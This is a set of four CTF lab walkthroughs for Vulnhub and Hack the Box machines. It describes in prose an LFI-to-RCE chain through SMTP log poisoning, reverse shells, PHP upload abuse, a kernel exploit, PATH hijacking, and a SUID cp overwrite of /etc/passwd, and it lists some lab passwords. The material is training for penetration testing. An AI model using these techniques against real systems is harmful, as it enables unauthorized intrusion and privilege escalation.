PumpkinGarden: Vulnhub Walkthrough

Today we are going to solve another CTF challenge known as mission Pumpkin and credit for making this VM machine goes to Jayanth which is designed for people who are beginners in the penetration testing field. The mission of this CTF is to gain access to PumpkinGarden_key file stored in the root account. So, let’s proceed towards solve this Mission Pumpkin.

You can download this VM from vulnhub.com: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/

Security Level: Beginner

Penetration Methodology:

Scanning

  • Nmap

Enumeration

  • Anonymous FTP login
  • Web Directory Search

Exploiting

  • SSH connect

Privilege Escalation

Scanning

Let’s start with our first step which is scanning, for which we will use Nmap tool to check open ports states.

Here as we can see that port 21 for FTP is open and anonymous user can login ftp. Moreover, we can also observe that http is service in running on port 1515 and open ssh service is running on port 3535. Now we will move towards our next step which is enumeration.

Enumeration

First, we will try to connect through ftp with anonymous as username and password. Here we have found note.txt then we will transfer this file in our system

Now as we had seen that Apache service was running on port 1515. So, we will open that in our browser where we have not found anything interesting.

Now we will use dirb for web directory enumeration and we will found the /img directory there.

Inside the image directory; we got a file named hidden_secrets. 

When we opened that file, we got our next clue which was a secret key.

This key is encrypted in base64 so first we will decode it to get the clue.

Now we are assuming that these can be the usernames:scarecrow and passwords:[email protected]$y.

Exploiting

Now we will try to connect through ssh with help of credential found above. after login as scarecrow here we have found file note.txt and after opening this we will get another clue which is password. So further we will check the list of users in etc/passwd file.

We got the list of users, now we will switch to goblin user and enter the password key Y0n$M4sv3D1t and we are successful login by doing so. 

In goblin user, we found another note file which contains a link of exploit db for exploiting as shown in the image at the bottom.

Now we will click on the link which is provided there and downloaded the bash file which holds the method to gain access of root.

So, as we run the commands which we have got we will get the root access and we are logged in as root. We have got pumpkeygarden_key here which reflects that we have solved this CTF successfully.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here

Symfonos:1 Vulnhub Walkthrough

This is another post on vulnhub CTF “named as “symfonos” by Zayotic. It is designed for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by the author.

You can download it from here: https://www.vulnhub.com/entry/symfonos-1,322/

Level: Beginner to Intermediate

Penetrating Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • SMB Shares folder
  • Wpscan

Exploiting

  • Exploiting WordPress again LFI
  • LFI to RCE via SMTP log Poising

Privilege Escalation

  • PATH Variable
  • Capture the flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP 192.168.0.16. Now, let’s scan the services and ports via nmap.

Enumeration

After scanning, we go to network enumeration and for that I used enum4linux. Here I found a user account helios and share directory /anonymous & /helios

So try to connect with the shared network for accessing the/anonymous directory by connecting through smb.

So, in this shared folder I found a text file that I had explored here as shown below. The /attention.txt file gave some hint for user password as highlighted in the image. Hopefully, we can use any of these passwords to access a shared folder /helios.

Further, I try to access /helios using “qwerty” as login password and then I explored other files research.txt and todo.txt, although the research.txt was not much helpful but todo.txt gave a hint for /h3l105 that could be web file or web directory. 

So, navigate to a web browser to access /h3l105 and found it as a WordPress website 

Then I have added the host inside /etc/hosts file and move ahead for scanning vulnerability.

Further, we used wpscan for vulnerability scanning on the website. To do so we run the following command:

Wpscan has shown the exploit is available for a plugin which is vulnerable to LFI (Local File Inclusion). 

On exploring the following link, we got proof-of-concept would be to load passwd file.

https://www.exploit-db.com/exploits/40290

As a result, we have accessed the passwd file and it proved that this site is vulnerable to LFI. Now through this LFI, I will try to create Remote code execution.

To escalate LFI to RCE we can use SMTP log poison approach and therefore we connect to SMTP service via telnet and they type the following command to inject malicious php code.

As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via the command line (CLI) of this machine and inject malicious php code via data.

As our goal is to inject PHP code into the logs and this stage is called logfile poisoning and we can clearly see that details of mail.log, as well as execute comment given through cmd (c); now execute id as cmd comment to verify user-id and confirm its result from inside the given screenshot.

This technique is known as SMTP log poisoning and through such type of vulnerability, we can easily take the reverse shell of the victim’s machine.

Therefore, execute the following URL to run netcat reverse command and start netcat listener on kali:

Wow!! We got a reverse connection on netcat as shown in the below image. Further, we need to escalate the privilege from low privilege shell to higher.

Therefore, on spawning local shell I use find command to identify SUID enable binaries. Here I found SUID bit, is enabled for /opt/statuscheck.

Further, we use string command for extracting metadata of statuscheck where it was trying to call curl but get a fatal error when program executes. Such type of error occurs due to missing path variable in the current directory.

To know more, read from here: Linux Privilege Escalation Using PATH Variable

Taking advance of this loophole we try to export path for rouge curl which will call /bin/bash on executing the statuscheck program

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Box: Help Walkthrough

Help is a recently retired CTF challenge VM on Hack the Box and the objective remains the same– Capture the root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Help is 10.10.10.121

Penetration Methodology

Scanning

  • Network Scanning (Nmap)

Enumeration

  • Web Spidering (dirb)

Exploiting

  • Analyzing the behaviour of submitting ticket script
  • Uploading PHP shell and noting the timestamp
  • Converting shell+timestamp to md5 hash
  • Finding shell on the web server
  • Getting reverse shell through netcat
  • Reading user.txt

Privilege Escalation

  • Finding kernel exploit of Linux 4.4.0 version.
  • Compiling with GCC and escalating privilege
  • Reading root.txt

Walkthrough

Scanning

Let’s start off with the most obvious step, that is nmap to check open ports.

Here I found port 22 for SSH, 80 and 3000 for HTTP are opened others were filtered

We immediately proceed towards port 80 when we see it open. But there was absolutely nothing on the homepage.

Enumeration

But maybe, there is some other directory which is set as a homepage for a web application, so we won’t stop ourselves from directory enumeration with dirb.

Here we found two directories, one is the javascript directory which seems of less use as per usual. But then there is another directory called /support which seemed interesting. We checked it on the browser, and it seemed like a ticketing system.

Exploiting

Now, it is obvious that there will be a file upload option given in any ticketing system. And maybe, it is also possible that there is a vulnerability in the file upload mechanism.

We created a sample text file called demo.txt just to check whether the system is actually accepting uploads or not.

It seemed to be working fine!!

It successfully got uploaded and redirected us back to the homepage.

Now we tried enumerating the web server on a deeper level, but we couldn’t see our text file anywhere. It is possible that the php backend would have just renamed the file as per dev defined rules. Only if there was a way to check the code!

After googling HelpDeskZ, we found that the source code was available on GitHub. And that could actually give us a closer look at the code of the upload script.

Now, in controllers/submit_ticket_controller.php, we found the code that was responsible for uploading a file on the server.

There are three interesting noteworthy things here:

  1. The file uploaded is going to “/support/<Upload_dir>/tickets
  2. There is no check on the type of file being uploaded! The error message is generated after the file is already uploaded so it has no actual significance!
  3. File uploaded is being converted to a format: md5(shellname+ epoch timestamp) + .php

We are certain that it is in fact epoch timestamp because of the working of “time()” function

So, it is pretty clear that we will upload a php reverse shell (we took pentester monkey’s reverse netcat php shell) and work towards exploiting this file upload vulnerability. But we were unable to find our text file a few minutes ago. Now that we know what the format of storing the file on the web server is, let’s work our way towards manually creating an md5 hash.

For this, we need to know the current time on the web server. Our time zone could be way different than the server’s and to generate an exact timestamp, we upload a php shell while capturing the network request in developer tools in Firefox.

Now that we had the time in GMT, we headed to www.epochconverter.com and converted this time into an epoch timestamp.

Now that we had obtained this timestamp, we could either write a short script in PHP that uses an md5 hash function to generate the hash or we can simply open the php in an interactive mode:

Your timestamp will vary than ours.

Now that it had given us a hash, all was left to do was to find it and open it in our browser, set a reverse nc connection and get a shell.

And in the article above you can see that we know it is being uploaded to “/support/<upload_dir>/tickets” but the problem was we didn’t know what the name of upload directory is. Our best bet was going with the name “uploads” since we saw that folder name in the GitHub files as well.

So, we set a reverse netcat listener and got a shell immediately! We spawned a proper TTY using python and read the user.txt file in home directory.

Privilege Escalation

Now for the privilege escalation part, we checked the kernel version with uname –a and found it to be vulnerable to a kernel exploit. We downloaded it using searchsploit and That made it super easy!

We changed the directory to tmp and downloaded this exploit using wget command, compile it with GCC and boom went the magic!

And voila! That’s how we escalated privilege in Help CTF and read the congratulatory message under root directory in root.txt.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. contact here

Happycorp:1 Vulnhub Walkthrough

This is another post on vulnhub CTF “named as “HAPPYCORP:1” by Zayotic. It is designed for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by the author.

You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/

Penetrating Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • NFS-Share
  • Mount share directory
  • Obtain user.txt -1st flag
  • Obtain SSH key
  • Cracked SSH passphrase (john the ripper)

Exploiting

  • Login to SSH
  • Break jail (rbash shell)

Privilege Escalation

  • Abusing SUID Binary
  • Obtain flag.txt-2nd flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP 192.168.1.104. Now, let’s scan the services and ports via nmap.

We have obtained the fruitful result from the nmap scan, as you can observe so many services are running on the various port. Such as 22: SSH, 80: HTTP and so on.

Enumeration

As we always navigate with HTTP services first, therefore we browse http://192.168.1.104 as the URL but found nothing interesting.

We found that network share service was also available on port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.

we found /home/karl is a shared directory that we can mount in our local machine as given below:

As I mount /home/karl in our /tmp/raj directory but I didn’t find anything here, truthfully when I try to open .ssh directory, it gave permission denied error.

Therefore, I add a user “aaru” in the group that has GID of 1001 on my Kali machine and successfully access the .ssh folder as shown in below steps (Same as the approach was used in Lin-Security).

Then access our 1st flag i.e. user.txt and moreover copies the id_rsa key in our local machine by executing following command:

Further, I explored id _rsa.pub and authorized key where I noticed [email protected] and realized that Karl could be the possible username for ssh login. Therefore, I used the id_rsa key for login into ssh as karl but failed to login into it, as it required a passphrase for the key.

Then we have used ssh2john to convert this SSH key into a crackable file for John the ripper and further used the rockyou.txt wordlist for johntheripper.

After obtaining the passphrase “sheep” we changed the permission of RSA key and login as karl but unfortunately, we got access of restricted shell also known rbash as a shell.

Therefore, I tried to access the bash shell directly through ssh by simply typing the following:

Luckily it works and we have successfully access the proper shell.

Privilege Escalation

Now it’s time to escalate the root privilege and finish this task, therefore with help of find command I look for SUID enabled binaries, where I found SUID bit, is enabled for copy binary (/bin/cp).

Hmm!! if suid bit is enabled on /bin/cp then we can copy any system file of root level or can overwrite the existing file.   First, I have explored the /etc /passwd file where karl was end user as shown in the below image and our vision is to edit this file by adding a new user.

On other hands, we have generated a new encrypted password: pass123 using OpenSSL passwd

So, we have copied the whole content of /etc/passwd file in a text editor and then create a new record for user “ignite that owns root level permissions. Saved this file as passwd and further used python server for transferring it into victim’s machine.

Inside /tmp folder, we have downloaded our passwd file and with the help of copy command, we have replaced the original /etc/passwd from our file as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here